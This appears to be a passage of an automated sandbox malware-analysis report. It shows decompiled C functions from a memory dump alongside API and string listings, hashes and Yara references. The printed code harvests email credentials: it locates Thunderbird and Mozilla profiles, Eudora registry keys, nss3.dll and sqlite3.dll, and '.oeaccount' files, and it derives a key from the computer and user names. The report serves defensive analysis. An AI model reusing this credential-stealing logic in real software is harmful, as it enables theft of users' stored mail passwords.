				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				void _v20;
				long _v24;
				int _v28;
				int _v32;
				void* _v36;
				void _v291;
				char _v292;
				void _v547;
				char _v548;
				void _v1058;
				short _v1060;
				void _v1570;
				short _v1572;
				int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t99;
				signed int _t104;
				signed short* _t110;
				void* _t113;
				void* _t114;

				_t92 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				memset( &_v291, 0, 0xff);
				_v548 = 0;
				memset( &_v547, 0, 0xff);
				_v1572 = 0;
				memset( &_v1570, 0, 0x1fe);
				_v1060 = 0;
				memset( &_v1058, 0, 0x1fe);
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				GetComputerNameA( &_v292,  &_v24); // executed
				_v24 = 0xff;
				GetUserNameA( &_v548,  &_v24); // executed
				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_v32 = strlen( &_v292);
				_t88 = strlen( &_v548);
				_t113 = _v36;
				_v28 = _t88;
				memcpy(_t113,  &_v20, 0x10);
				_t91 = 0xba0da71d;
				if(_v28 > 0) {
					_t110 =  &_v1060;
					do {
						_t104 = _a4 & 0x80000003;
						if(_t104 < 0) {
							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t96 = ( *_t110 & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
						_a4 = _a4 + 1;
						_t110 =  &(_t110[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t92) {
					do {
						_t99 = _a4 & 0x80000003;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
						_a4 = _a4 + 1;
						_t92 = _t92 + 1;
					} while (_t92 < _v32);
				}
				return _t91;
			}









































                                                                                                                                                                  0x004073c7
                                                                                                                                                                  0x004073d2
                                                                                                                                                                  0x004073d6
                                                                                                                                                                  0x004073da
                                                                                                                                                                  0x004073de
                                                                                                                                                                  0x004073e2
                                                                                                                                                                  0x004073e6
                                                                                                                                                                  0x004073ea
                                                                                                                                                                  0x004073ee
                                                                                                                                                                  0x004073f2
                                                                                                                                                                  0x004073f6
                                                                                                                                                                  0x004073fa
                                                                                                                                                                  0x004073fe
                                                                                                                                                                  0x00407402
                                                                                                                                                                  0x00407406
                                                                                                                                                                  0x0040740a
                                                                                                                                                                  0x0040740e
                                                                                                                                                                  0x00407412
                                                                                                                                                                  0x00407418
                                                                                                                                                                  0x00407426
                                                                                                                                                                  0x0040742c
                                                                                                                                                                  0x0040743f
                                                                                                                                                                  0x00407446
                                                                                                                                                                  0x00407454
                                                                                                                                                                  0x0040745b
                                                                                                                                                                  0x00407466
                                                                                                                                                                  0x00407477
                                                                                                                                                                  0x0040747a
                                                                                                                                                                  0x0040747d
                                                                                                                                                                  0x0040748e
                                                                                                                                                                  0x00407491
                                                                                                                                                                  0x004074b0
                                                                                                                                                                  0x004074c5
                                                                                                                                                                  0x004074d3
                                                                                                                                                                  0x004074dd
                                                                                                                                                                  0x004074e2
                                                                                                                                                                  0x004074e5
                                                                                                                                                                  0x004074ef
                                                                                                                                                                  0x004074fa
                                                                                                                                                                  0x004074ff
                                                                                                                                                                  0x00407501
                                                                                                                                                                  0x00407507
                                                                                                                                                                  0x0040750a
                                                                                                                                                                  0x00407510
                                                                                                                                                                  0x00407516
                                                                                                                                                                  0x00407516
                                                                                                                                                                  0x0040751a
                                                                                                                                                                  0x0040751d
                                                                                                                                                                  0x00407526
                                                                                                                                                                  0x00407528
                                                                                                                                                                  0x0040752f
                                                                                                                                                                  0x00407530
                                                                                                                                                                  0x00407507
                                                                                                                                                                  0x00407538
                                                                                                                                                                  0x0040753a
                                                                                                                                                                  0x0040753d
                                                                                                                                                                  0x00407543
                                                                                                                                                                  0x00407549
                                                                                                                                                                  0x00407549
                                                                                                                                                                  0x00407552
                                                                                                                                                                  0x00407555
                                                                                                                                                                  0x0040755e
                                                                                                                                                                  0x00407560
                                                                                                                                                                  0x00407563
                                                                                                                                                                  0x00407564
                                                                                                                                                                  0x0040753a
                                                                                                                                                                  0x0040756d

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                  • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                  • API String ID: 1832431107-3760989150
                                                                                                                                                                  • Opcode ID: aceb3002e6d76f9fd17eae514da83f7be29cbb3531b765aef18c994d04d9c626
                                                                                                                                                                  • Instruction ID: c4a028c48163d552ebb965a22663fb4caedd15d38ec5c0ca2e6f283cdba292cd
                                                                                                                                                                  • Opcode Fuzzy Hash: aceb3002e6d76f9fd17eae514da83f7be29cbb3531b765aef18c994d04d9c626
                                                                                                                                                                  • Instruction Fuzzy Hash: 7A51E771C0025DAEDB11CFA8CC40BEEBBBCEF49314F0442AAE555E6191D3789B85CB65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040702D, Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040702D(void** __eax) {
				void* __esi;
				void* _t15;
				int _t16;
				int _t17;
				void* _t26;
				void** _t38;
				void** _t40;
				void* _t45;

				_t40 = __eax;
				_t15 =  *__eax;
				if(_t15 != 0xffffffff) {
					_t6 =  &(_t40[0x52]); // 0x247
					_t16 = FindNextFileA(_t15, _t6); // executed
					 *(_t45 + 4) = _t16;
					if(_t16 != 0) {
						goto L5;
					} else {
						E004070C5(_t40);
						goto L4;
					}
				} else {
					_t1 =  &(_t40[0x52]); // 0x247
					_t2 =  &(_t40[1]); // 0x103
					_t26 = FindFirstFileA(_t2, _t1); // executed
					 *_t40 = _t26;
					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
					L4:
					if( *(_t45 + 4) != 0) {
						L5:
						_t9 =  &(_t40[0xa2]); // 0x387
						_t38 = _t9;
						_t10 =  &(_t40[0x5d]); // 0x273
						_t28 = _t10;
						_t41 =  &(_t40[0xf3]);
						_t17 = strlen( &(_t40[0xf3]));
						if(strlen(_t10) + _t17 + 1 >= 0x143) {
							 *_t38 = 0;
						} else {
							E004062B7(_t38, _t41, _t28);
						}
					}
				}
				return  *(_t45 + 4);
			}











                                                                                                                                                                  0x0040702f
                                                                                                                                                                  0x00407031
                                                                                                                                                                  0x00407036
                                                                                                                                                                  0x00407059
                                                                                                                                                                  0x00407061
                                                                                                                                                                  0x00407069
                                                                                                                                                                  0x0040706d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040706f
                                                                                                                                                                  0x0040706f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040706f
                                                                                                                                                                  0x00407038
                                                                                                                                                                  0x00407038
                                                                                                                                                                  0x0040703f
                                                                                                                                                                  0x00407043
                                                                                                                                                                  0x00407051
                                                                                                                                                                  0x00407053
                                                                                                                                                                  0x00407074
                                                                                                                                                                  0x00407079
                                                                                                                                                                  0x0040707b
                                                                                                                                                                  0x0040707e
                                                                                                                                                                  0x0040707e
                                                                                                                                                                  0x00407084
                                                                                                                                                                  0x00407084
                                                                                                                                                                  0x0040708a
                                                                                                                                                                  0x00407091
                                                                                                                                                                  0x004070a9
                                                                                                                                                                  0x004070b8
                                                                                                                                                                  0x004070ab
                                                                                                                                                                  0x004070af
                                                                                                                                                                  0x004070b5
                                                                                                                                                                  0x004070bd
                                                                                                                                                                  0x00407079
                                                                                                                                                                  0x004070c4

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,0041134A,*.oeaccount,0041141B,?,00000104), ref: 00407043
                                                                                                                                                                  • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,0041134A,*.oeaccount,0041141B,?,00000104), ref: 00407061
                                                                                                                                                                  • strlen.MSVCRT ref: 00407091
                                                                                                                                                                  • strlen.MSVCRT ref: 00407099
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 379999529-0
                                                                                                                                                                  • Opcode ID: 23327769c2c6ed145b7f0a678d94cded64fbce7ba272a02f3800eca3ff4be886
                                                                                                                                                                  • Instruction ID: ee1fc6f362411e34e0c03f62be7ba86f9bee0943d1b98e177d8d8cef5f5d9398
                                                                                                                                                                  • Opcode Fuzzy Hash: 23327769c2c6ed145b7f0a678d94cded64fbce7ba272a02f3800eca3ff4be886
                                                                                                                                                                  • Instruction Fuzzy Hash: 1E1182728092059FD3149B34D844ADBB7DC9F04325F204A3FF05AD31D0EB38B945876A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401E4A, Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                  			E00401E4A(void* __eflags, char* _a4) {
				signed int _v8;
				int _v12;
				void _v275;
				char _v276;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void _v1059;
				char _v1060;
				void _v1323;
				char _v1324;
				void _v2347;
				char _v2348;
				void* __edi;
				void* __esi;
				int _t65;
				char* _t69;
				char _t70;
				int _t71;
				char _t75;
				void* _t76;
				long _t78;
				void* _t83;
				int _t85;
				void* _t87;
				int _t104;
				int _t108;
				char _t126;
				void* _t137;
				void* _t139;
				char* _t157;
				char* _t158;
				char* _t160;
				int _t161;
				void* _t164;
				CHAR* _t169;
				char* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;

				_v540 = 0;
				memset( &_v539, 0, 0x104);
				_t164 = 0x1a;
				E0040F4CA( &_v540, _t164); // executed
				_t65 = strlen("Mozilla\\Profiles");
				_t6 = strlen( &_v540) + 1; // 0x1
				_t172 = _t171 + 0x14;
				if(_t65 + _t6 >= 0x104) {
					_t69 = _a4;
					 *_t69 = 0;
					_t157 = _t69;
				} else {
					_t157 = _a4;
					E004062B7(_t157,  &_v540, "Mozilla\\Profiles");
				}
				_t70 = E00406155(_t157);
				if(_t70 == 0) {
					 *_t157 = _t70;
				}
				_t158 = _t157 + 0x105;
				_t71 = strlen("Thunderbird\\Profiles");
				_t12 = strlen( &_v540) + 1; // 0x1
				if(_t71 + _t12 >= 0x104) {
					 *_t158 = 0;
				} else {
					E004062B7(_t158,  &_v540, "Thunderbird\\Profiles");
				}
				_t75 = E00406155(_t158);
				_pop(_t137);
				if(_t75 == 0) {
					 *_t158 = _t75;
				}
				_t160 = _a4 + 0x20a;
				_t76 = E00401C56(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
				_t173 = _t172 + 0xc;
				if(_t76 == 0) {
					_t126 = E00401C56(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x41344f); // executed
					_t173 = _t173 + 0xc;
					if(_t126 == 0) {
						 *_t160 = _t126;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t78 = E0040F1B0(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
				_t174 = _t173 + 0xc;
				if(_t78 != 0) {
					L32:
					_t169 = _a4 + 0x30f;
					if( *_t169 != 0) {
						L35:
						return _t78;
					}
					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
					_t78 = E00406155(_t169);
					if(_t78 != 0) {
						goto L35;
					}
					 *_t169 = _t78;
					return _t78;
				} else {
					_v796 = _t78;
					_t161 = 0;
					memset( &_v795, 0, 0xff);
					_v12 = 0;
					_t83 = E0040F276(_v8, 0,  &_v796);
					_t175 = _t174 + 0x18;
					if(_t83 != 0) {
						L31:
						_t78 = RegCloseKey(_v8);
						goto L32;
					}
					_t170 = "sqlite3.dll";
					do {
						_t85 = atoi( &_v796);
						_pop(_t139);
						if(_t85 < 3) {
							goto L28;
						}
						_v2348 = 0;
						memset( &_v2347, _t161, 0x3ff);
						_v276 = 0;
						memset( &_v275, _t161, 0x104);
						sprintf( &_v2348, "%s\\Main",  &_v796);
						E0040F232(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
						_t175 = _t175 + 0x38;
						if(_v276 != 0 && E00406155( &_v276) != 0) {
							_v1060 = 0;
							memset( &_v1059, _t161, 0x104);
							_v1324 = 0;
							memset( &_v1323, _t161, 0x104);
							_t104 = strlen(_t170);
							_t41 = strlen( &_v276) + 1; // 0x1
							_t175 = _t175 + 0x20;
							if(_t104 + _t41 >= 0x104) {
								_v1060 = 0;
							} else {
								E004062B7( &_v1060,  &_v276, _t170);
							}
							_t108 = strlen("nss3.dll");
							_t47 = strlen( &_v276) + 1; // 0x1
							if(_t108 + _t47 >= 0x104) {
								_v1324 = 0;
							} else {
								E004062B7( &_v1324,  &_v276, "nss3.dll");
							}
							if(E00406155( &_v1060) == 0 || E00406155( &_v1324) == 0) {
								_t161 = 0;
								goto L28;
							} else {
								strcpy(_a4 + 0x30f,  &_v276);
								goto L31;
							}
						}
						L28:
						_v12 = _v12 + 1;
						_t87 = E0040F276(_v8, _v12,  &_v796);
						_t175 = _t175 + 0xc;
					} while (_t87 == 0);
					goto L31;
				}
			}














































                                                                                                                                                                  0x00401e65
                                                                                                                                                                  0x00401e6c
                                                                                                                                                                  0x00401e73
                                                                                                                                                                  0x00401e7a
                                                                                                                                                                  0x00401e85
                                                                                                                                                                  0x00401e98
                                                                                                                                                                  0x00401e9c
                                                                                                                                                                  0x00401ea1
                                                                                                                                                                  0x00401eb9
                                                                                                                                                                  0x00401ebc
                                                                                                                                                                  0x00401ebf
                                                                                                                                                                  0x00401ea3
                                                                                                                                                                  0x00401ea3
                                                                                                                                                                  0x00401eb0
                                                                                                                                                                  0x00401eb6
                                                                                                                                                                  0x00401ec2
                                                                                                                                                                  0x00401eca
                                                                                                                                                                  0x00401ecc
                                                                                                                                                                  0x00401ecc
                                                                                                                                                                  0x00401ed3
                                                                                                                                                                  0x00401ed9
                                                                                                                                                                  0x00401eec
                                                                                                                                                                  0x00401ef4
                                                                                                                                                                  0x00401f0d
                                                                                                                                                                  0x00401ef6
                                                                                                                                                                  0x00401f04
                                                                                                                                                                  0x00401f0a
                                                                                                                                                                  0x00401f11
                                                                                                                                                                  0x00401f18
                                                                                                                                                                  0x00401f19
                                                                                                                                                                  0x00401f1b
                                                                                                                                                                  0x00401f1b
                                                                                                                                                                  0x00401f2a
                                                                                                                                                                  0x00401f35
                                                                                                                                                                  0x00401f3a
                                                                                                                                                                  0x00401f44
                                                                                                                                                                  0x00401f51
                                                                                                                                                                  0x00401f56
                                                                                                                                                                  0x00401f5b
                                                                                                                                                                  0x00401f5d
                                                                                                                                                                  0x00401f5d
                                                                                                                                                                  0x00401f5b
                                                                                                                                                                  0x00401f5f
                                                                                                                                                                  0x00401f6d
                                                                                                                                                                  0x00401f72
                                                                                                                                                                  0x00401f77
                                                                                                                                                                  0x00402168
                                                                                                                                                                  0x0040216b
                                                                                                                                                                  0x00402174
                                                                                                                                                                  0x00402194
                                                                                                                                                                  0x00402194
                                                                                                                                                                  0x00402194
                                                                                                                                                                  0x0040217d
                                                                                                                                                                  0x00402184
                                                                                                                                                                  0x0040218c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040218e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401f7d
                                                                                                                                                                  0x00401f82
                                                                                                                                                                  0x00401f88
                                                                                                                                                                  0x00401f92
                                                                                                                                                                  0x00401fa2
                                                                                                                                                                  0x00401fa5
                                                                                                                                                                  0x00401faa
                                                                                                                                                                  0x00401faf
                                                                                                                                                                  0x0040215f
                                                                                                                                                                  0x00402162
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402162
                                                                                                                                                                  0x00401fb5
                                                                                                                                                                  0x00401fba
                                                                                                                                                                  0x00401fc1
                                                                                                                                                                  0x00401fc9
                                                                                                                                                                  0x00401fca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401fdd
                                                                                                                                                                  0x00401fe4
                                                                                                                                                                  0x00401ff2
                                                                                                                                                                  0x00401ff9
                                                                                                                                                                  0x00402011
                                                                                                                                                                  0x0040202d
                                                                                                                                                                  0x00402032
                                                                                                                                                                  0x0040203c
                                                                                                                                                                  0x00402060
                                                                                                                                                                  0x00402067
                                                                                                                                                                  0x00402075
                                                                                                                                                                  0x0040207c
                                                                                                                                                                  0x00402082
                                                                                                                                                                  0x00402095
                                                                                                                                                                  0x00402099
                                                                                                                                                                  0x0040209e
                                                                                                                                                                  0x004020b7
                                                                                                                                                                  0x004020a0
                                                                                                                                                                  0x004020ae
                                                                                                                                                                  0x004020b4
                                                                                                                                                                  0x004020c3
                                                                                                                                                                  0x004020d6
                                                                                                                                                                  0x004020de
                                                                                                                                                                  0x004020fb
                                                                                                                                                                  0x004020e0
                                                                                                                                                                  0x004020f2
                                                                                                                                                                  0x004020f8
                                                                                                                                                                  0x00402111
                                                                                                                                                                  0x00402124
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402148
                                                                                                                                                                  0x00402158
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040215e
                                                                                                                                                                  0x00402111
                                                                                                                                                                  0x00402126
                                                                                                                                                                  0x00402126
                                                                                                                                                                  0x00402136
                                                                                                                                                                  0x0040213b
                                                                                                                                                                  0x0040213e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402146

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00401E6C
                                                                                                                                                                  • strlen.MSVCRT ref: 00401E85
                                                                                                                                                                  • strlen.MSVCRT ref: 00401E93
                                                                                                                                                                  • strlen.MSVCRT ref: 00401ED9
                                                                                                                                                                  • strlen.MSVCRT ref: 00401EE7
                                                                                                                                                                  • memset.MSVCRT ref: 00401F92
                                                                                                                                                                  • atoi.MSVCRT ref: 00401FC1
                                                                                                                                                                  • memset.MSVCRT ref: 00401FE4
                                                                                                                                                                  • sprintf.MSVCRT ref: 00402011
                                                                                                                                                                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                                                                                                                                                                  • memset.MSVCRT ref: 00402067
                                                                                                                                                                  • memset.MSVCRT ref: 0040207C
                                                                                                                                                                  • strlen.MSVCRT ref: 00402082
                                                                                                                                                                  • strlen.MSVCRT ref: 00402090
                                                                                                                                                                  • strlen.MSVCRT ref: 004020C3
                                                                                                                                                                  • strlen.MSVCRT ref: 004020D1
                                                                                                                                                                  • memset.MSVCRT ref: 00401FF9
                                                                                                                                                                    • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                                                                                                                                                                    • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000), ref: 00402158
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402162
                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040217D
                                                                                                                                                                    • Part of subcall function 00406155: GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                                                                                                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                  • API String ID: 2492260235-4223776976
                                                                                                                                                                  • Opcode ID: 59627f2f584a0fc03280b870890c3a08f891bace1e47a2458c552be32f244d3b
                                                                                                                                                                  • Instruction ID: 6d070b6b648a05e91db5632b048882ca6db18ac9797f22d42d855398ddad24fb
                                                                                                                                                                  • Opcode Fuzzy Hash: 59627f2f584a0fc03280b870890c3a08f891bace1e47a2458c552be32f244d3b
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B91C772804159AEDB21E6958C45FDB7BAD9F18309F1400BBF608F2182EB789BC58B5D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040BB8D, Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E0040BB8D(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v304;
				signed int _v308;
				struct HWND__* _v312;
				intOrPtr _v608;
				struct HACCEL__* _v620;
				struct HWND__* _v644;
				char _v900;
				char _v904;
				char _v908;
				struct tagMSG _v936;
				intOrPtr _v940;
				struct HWND__* _v944;
				struct HWND__* _v948;
				char _v956;
				char _v980;
				char _v988;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t49;
				void* _t52;
				int _t56;
				int _t58;
				int _t69;
				void* _t73;
				int _t76;
				int _t78;
				struct HWND__* _t79;
				int _t81;
				int _t86;
				int _t87;
				struct HWND__* _t101;

				_t96 = __ecx;
				 *0x417b94 = _a4;
				_t49 = E00404841(__ecx);
				if(_t49 != 0) {
					E0040F41D();
					_t52 = E00406A5B( &_v980);
					_t101 = 0;
					_v940 = 0x20;
					_v948 = 0;
					_v936.hwnd = 0;
					_v944 = 0;
					_v936.message = 0;
					E0040B91E(_t52,  &_v900); // executed
					_v8 =  &_v980;
					E00406DF1(__eflags,  &_v980, _a12);
					_t56 = E00406F65(_v16, "/savelangfile");
					__eflags = _t56;
					if(_t56 < 0) {
						E004083A7(); // executed
						_t58 = E00406F65(_v8, "/deleteregkey");
						__eflags = _t58;
						if(_t58 < 0) {
							 *0x418110 = 0x11223344; // executed
							EnumResourceTypesA( *0x417b94, E0040F402, 0); // executed
							__eflags =  *0x418110 - 0x4695399a;
							if( *0x418110 == 0x4695399a) {
								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
								if(__eflags <= 0) {
									L13:
									__imp__CoInitialize(_t101);
									E0040B84C(_t96,  &_v908);
									__eflags = _v608 - 3;
									if(_v608 != 3) {
										_push(5);
									} else {
										_push(3);
									}
									ShowWindow(_v644, ??);
									UpdateWindow(_v644);
									_v620 = LoadAcceleratorsA( *0x417b94, 0x67);
									E0040AEB7( &_v908);
									_t69 = GetMessageA( &_v936, _t101, _t101, _t101);
									__eflags = _t69;
									if(_t69 == 0) {
										L24:
										__imp__CoUninitialize();
										goto L25;
									} else {
										do {
											_t76 = TranslateAcceleratorA(_v644, _v620,  &_v936);
											__eflags = _t76;
											if(_t76 != 0) {
												goto L23;
											}
											_t79 =  *0x4181ac;
											__eflags = _t79 - _t101;
											if(_t79 == _t101) {
												L21:
												_t81 = IsDialogMessageA(_v644,  &_v936);
												__eflags = _t81;
												if(_t81 == 0) {
													TranslateMessage( &_v936);
													DispatchMessageA( &_v936);
												}
												goto L23;
											}
											_t86 = IsDialogMessageA(_t79,  &_v936);
											__eflags = _t86;
											if(_t86 != 0) {
												goto L23;
											}
											goto L21;
											L23:
											_t78 = GetMessageA( &_v936, _t101, _t101, _t101);
											__eflags = _t78;
										} while (_t78 != 0);
										goto L24;
									}
								}
								_t87 = E0040BAB7( &_v904, __eflags);
								__eflags = _t87;
								if(_t87 == 0) {
									_t101 = 0;
									__eflags = 0;
									goto L13;
								}
								_push(_v28);
								_v904 = 0x41457c;
								L00412096();
								__eflags = _v304;
								if(_v304 != 0) {
									DeleteObject(_v304);
									_v308 = _v308 & 0x00000000;
								}
								goto L27;
							}
							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
							goto L25;
						}
						RegDeleteKeyA(0x80000001, 0x41344f);
						goto L25;
					} else {
						 *0x418488 = 0x417b28;
						E004084D8();
						L25:
						_push(_v32);
						_v908 = 0x41457c;
						L00412096();
						__eflags = _v308 - _t101;
						if(_v308 != _t101) {
							DeleteObject(_v308);
							_v312 = _t101;
						}
						L27:
						_v908 = 0x41346c;
						E00406A7D( &_v988);
						E00404638( &_v956);
						E00406A7D( &_v988);
						_t73 = 0;
						__eflags = 0;
						goto L28;
					}
				} else {
					_t73 = _t49 + 1;
					L28:
					return _t73;
				}
			}








































                                                                                                                                                                  0x0040bb8d
                                                                                                                                                                  0x0040bb9f
                                                                                                                                                                  0x0040bba4
                                                                                                                                                                  0x0040bbab
                                                                                                                                                                  0x0040bbb3
                                                                                                                                                                  0x0040bbbc
                                                                                                                                                                  0x0040bbc1
                                                                                                                                                                  0x0040bbc7
                                                                                                                                                                  0x0040bbcf
                                                                                                                                                                  0x0040bbd3
                                                                                                                                                                  0x0040bbd7
                                                                                                                                                                  0x0040bbdb
                                                                                                                                                                  0x0040bbdf
                                                                                                                                                                  0x0040bbec
                                                                                                                                                                  0x0040bbf3
                                                                                                                                                                  0x0040bc04
                                                                                                                                                                  0x0040bc09
                                                                                                                                                                  0x0040bc0b
                                                                                                                                                                  0x0040bc21
                                                                                                                                                                  0x0040bc32
                                                                                                                                                                  0x0040bc37
                                                                                                                                                                  0x0040bc39
                                                                                                                                                                  0x0040bc5c
                                                                                                                                                                  0x0040bc66
                                                                                                                                                                  0x0040bc6c
                                                                                                                                                                  0x0040bc76
                                                                                                                                                                  0x0040bc97
                                                                                                                                                                  0x0040bc9b
                                                                                                                                                                  0x0040bce9
                                                                                                                                                                  0x0040bcea
                                                                                                                                                                  0x0040bcf5
                                                                                                                                                                  0x0040bcfa
                                                                                                                                                                  0x0040bd02
                                                                                                                                                                  0x0040bd08
                                                                                                                                                                  0x0040bd04
                                                                                                                                                                  0x0040bd04
                                                                                                                                                                  0x0040bd04
                                                                                                                                                                  0x0040bd11
                                                                                                                                                                  0x0040bd1e
                                                                                                                                                                  0x0040bd32
                                                                                                                                                                  0x0040bd3d
                                                                                                                                                                  0x0040bd50
                                                                                                                                                                  0x0040bd52
                                                                                                                                                                  0x0040bd54
                                                                                                                                                                  0x0040bdc4
                                                                                                                                                                  0x0040bdc4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bd56
                                                                                                                                                                  0x0040bd5c
                                                                                                                                                                  0x0040bd6f
                                                                                                                                                                  0x0040bd75
                                                                                                                                                                  0x0040bd77
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bd79
                                                                                                                                                                  0x0040bd7e
                                                                                                                                                                  0x0040bd80
                                                                                                                                                                  0x0040bd8e
                                                                                                                                                                  0x0040bd9a
                                                                                                                                                                  0x0040bd9c
                                                                                                                                                                  0x0040bd9e
                                                                                                                                                                  0x0040bda5
                                                                                                                                                                  0x0040bdb0
                                                                                                                                                                  0x0040bdb0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bd9e
                                                                                                                                                                  0x0040bd88
                                                                                                                                                                  0x0040bd8a
                                                                                                                                                                  0x0040bd8c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bdb6
                                                                                                                                                                  0x0040bdbe
                                                                                                                                                                  0x0040bdc0
